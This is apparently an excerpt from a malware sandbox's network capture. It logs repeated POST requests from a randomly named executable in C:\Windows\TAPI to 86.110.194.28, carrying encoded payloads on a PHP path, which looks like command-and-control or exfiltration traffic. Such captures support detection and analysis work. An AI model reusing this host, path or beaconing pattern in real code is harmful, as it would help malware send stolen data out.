                                                                                                                                                                        Data Ascii: ^W^_X_U]T[YZ[^W^_]ZTRQPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(-=" 2?(+*_06%?=V5. +(X0)$B0<8()#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:00.009135962 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:00.138685942 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:59 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        87192.168.2.45009486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:00.268465042 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:00.621206045 CET2516OUTData Raw: 5b 56 5e 50 5d 5a 50 50 54 5b 59 5a 5b 55 57 5b 5f 54 5a 55 52 55 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [V^P]ZPPT[YZ[UW[_TZURUPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(.^5:2+)]6^3'5]1?* $Q ;+094'S+#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:59:00.958904982 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:01.086683989 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:00 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        88192.168.2.45009586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:01.244991064 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:01.590245962 CET2512OUTData Raw: 5b 5c 5b 5c 58 57 50 5a 54 5b 59 5a 5b 57 57 59 5f 55 5a 5f 52 51 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\XWPZT[YZ[WWY_UZ_RQPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(-Z5:S1,>*Y3$5]2?)V6$=Q7 X'*73, V<9#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:59:01.949121952 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:02.080518961 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:01 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        89192.168.2.45009686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:02.320359945 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:02.668078899 CET2516OUTData Raw: 5e 50 5b 5b 58 5c 50 5d 54 5b 59 5a 5b 50 57 5b 5f 55 5a 5b 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[[X\P]T[YZ[PW[_UZ[RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C)>=\!* &<#=;39X2,!6':!(7$?0'<9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:02.977601051 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        90192.168.2.45009786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:03.096436977 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:03.449481964 CET2108OUTData Raw: 5b 5d 5b 5c 58 5b 50 51 54 5b 59 5a 5b 52 57 52 5f 53 5a 5f 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [][\X[PQT[YZ[RWR_SZ_RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%?>_"*32<=+*_'B9Y%/P!$%!+0[3$A3$(9#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:59:03.785831928 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:03.914947987 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5d 32 15 07 00 3d 2f 2c 00 31 33 0f 12 22 09 3b 05 38 09 36 41 21 3f 3e 00 25 2b 2b 0e 2b 13 36 41 28 0a 39 51 21 2e 31 57 29 30 28 5d 03 10 39 10 3f 3d 28 04 29 2d 31 59 39 24 23 14 27 0e 38 11 2b 33 25 1e 27 3c 03 0d 35 2e 2f 52 2a 0d 22 03 33 2b 3c 5d 28 0e 2b 13 24 07 20 54 0b 17 24 0d 30 30 24 06 31 16 0b 58 2a 0e 27 05 33 29 39 50 21 02 04 50 22 39 0e 5d 38 23 3d 55 30 06 36 0d 29 58 2c 0c 32 3a 0b 00 30 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $]2=/,13";86A!?>%+++6A(9Q!.1W)0(]9?=()-1Y9$#'8+3%'<5./R*"3+<](+$ T$00$1X*'3)9P!P"9]8#=U06)X,2:0.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        91192.168.2.45009886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:03.219265938 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:03.574350119 CET2516OUTData Raw: 5b 5c 5b 5c 58 5f 55 5f 54 5b 59 5a 5b 50 57 5e 5f 54 5a 5a 52 53 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\X_U_T[YZ[PW^_TZZRSPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A)>"#*;%<>]"%'%Y%66'!V (39<0Y8V+)#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:03.905606031 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.034710884 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        92192.168.2.45009986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:04.156013966 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.511946917 CET2516OUTData Raw: 5e 57 5e 5b 58 58 50 59 54 5b 59 5a 5b 53 57 5a 5f 55 5a 55 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^[XXPYT[YZ[SWZ_UZURUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+=5]"<R&/3((-3B>&/=S". (+$,'?+?#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:59:04.833029985 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.962728024 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:04 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        93192.168.2.45010086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:05.097970009 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2504
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:59:05.449337959 CET2504OUTData Raw: 5b 55 5e 51 5d 5c 50 5d 54 5b 59 5a 5b 57 57 5b 5f 51 5a 5e 52 52 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [U^Q]\P]T[YZ[WW[_QZ^RRPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>6 S&Z#)(!3'>2*6'"!(30;$$W+#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:59:05.794365883 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:05.926873922 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:05 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        94192.168.2.45010186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:06.071065903 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:06.418168068 CET2516OUTData Raw: 5b 51 5e 5d 5d 59 55 58 54 5b 59 5a 5b 53 57 5f 5f 5c 5a 5c 52 57 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^]]YUXT[YZ[SW__\Z\RWPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?=>!)0T%,,)+$B:&<=S"$7;+' @0<#?9#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:59:06.766067028 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:06.895543098 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        95192.168.2.45010286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:07.044748068 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:07.402508974 CET2516OUTData Raw: 5e 51 5b 5f 58 5d 50 5f 54 5b 59 5a 5b 54 57 5c 5f 55 5a 5a 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q[_X]P_T[YZ[TW\_UZZRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(>#9?%,D((._09X1?"!>##%9(B0(W+#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:59:07.733371019 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:07.862514019 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        96192.168.2.45010386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:08.020550966 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:08.371340990 CET2516OUTData Raw: 5b 54 5e 59 58 59 55 5b 54 5b 59 5a 5b 52 57 58 5f 55 5a 5c 52 5d 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YXYU[T[YZ[RWX_UZ\R]PFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D?>2!:&< (;_05[&?>!-784Z%*<&,'<#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:59:08.707544088 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:08.835349083 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:08 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        97192.168.2.45010486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:08.923975945 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2080
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        98192.168.2.45010586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:08.969907045 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:09.324436903 CET2516OUTData Raw: 5b 5c 5b 5c 58 56 50 59 54 5b 59 5a 5b 51 57 5e 5f 54 5a 5d 52 56 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\XVPYT[YZ[QW^_TZ]RVP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+-=5/1$>8*X'4&?:5$V#+,Z$9C$ <9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:59:09.654917955 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:09.791429043 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:09 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        99192.168.2.45010686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:59:09.930385113 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:59:10.632061005 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:20.645888090 CET166INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:10 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
